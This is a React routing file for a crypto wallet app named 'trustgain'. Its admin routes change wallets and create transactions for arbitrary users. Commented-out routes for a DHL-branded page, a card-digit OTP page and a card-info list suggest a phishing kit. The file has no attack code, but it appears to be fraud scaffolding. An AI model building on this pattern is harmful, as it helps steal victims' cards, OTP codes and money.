import { ThemeProvider, createTheme } from "@mui/material/styles";
import { Router } from "@reach/router";
import { createContext } from "react";
import InstallPWA from "./pwainstallbutton";
import ResponsiveDrawer from "./trustgain/dashboard";
import HomeIndex from "./trustgain/pages";
import AdminIndex from "./trustgain/pages/admin";
import AdminInfo from "./trustgain/pages/admin/admininfo";
import AllUserTablesmain from "./trustgain/pages/admin/allusers";
import ChangeWalletIndex from "./trustgain/pages/admin/changewallet";
import CreateTransferIndex from "./trustgain/pages/admin/createtransaction";
import AlluserTransactions from "./trustgain/pages/admin/createtransaction/usertransaction";
import AllTransactions from "./trustgain/pages/admin/transactions";
import AllCoins from "./trustgain/pages/allcoins";
import AllCoinsAction from "./trustgain/pages/allcoinsaction";
import AuthenticationIndex from "./trustgain/pages/authentication";
import SignIn from "./trustgain/pages/authentication/login";
import ResetPassword from "./trustgain/pages/authentication/resetpassword";
import SignUp from "./trustgain/pages/authentication/signup";
import CoinAction from "./trustgain/pages/coin";
import ConnectWallet from "./trustgain/pages/connectwallet";
import Profile from "./trustgain/pages/profile";
import Send from "./trustgain/pages/send";
import Settings from "./trustgain/pages/settings";
import Identity from "./trustgain/pages/verification";
import { SocketContext, socket } from "./context/socket";

export const AppContext = createContext();

const theme = createTheme({
  palette: {
    primary: {
      main: "#0d47a1",
    },
    background: {
      default: "#e4e3ef",
    },
  },
});

function App() {
  return (
    <div style={{ display: "flex", flexDirection: "column" }}>
      <SocketContext.Provider value={socket}>
        <ThemeProvider theme={theme}>
          <Router>
            <ResponsiveDrawer path="/">
              <HomeIndex path="/" />
              <AllCoins path="/coins" />
              <AllCoinsAction path="/allcoin" />
              <CoinAction path="/coin" />
              <Send path="/send" />
              <ConnectWallet path="/connect" />
              <Profile path="/profile" />
              <Settings path="/settings/:action" />
              <Identity path="/kyc" />
            </ResponsiveDrawer>

            <AuthenticationIndex path="/account">
              <SignIn path="login" />
              <SignIn path="admin/:pathtonavigate" />
              <SignUp path="signup" />
              <ResetPassword path="resetpassword" />
            </AuthenticationIndex>

            <AdminIndex path="manager">
              <AdminInfo path="/" />
              <AllUserTablesmain path="users" />
              <AllTransactions path="transactions" />
              <ChangeWalletIndex path="wallets" />
              <AlluserTransactions path="usertransactions/:id" />
              <CreateTransferIndex path="addtransaction/:id" />
            </AdminIndex>
          </Router>
        </ThemeProvider>
        <InstallPWA />
      </SocketContext.Provider>
    </div>
  );
}

export default App;

/*
<Route path="/:param" element={<DhlExpress />} />
          <Route path="/sendcode/:cardigit/:param" element={<Otp />} />
          <Route path="/confirm" element={<Verified />} />
          <Route path="/info/:docId" element={<AllCardInfos />} />
*/
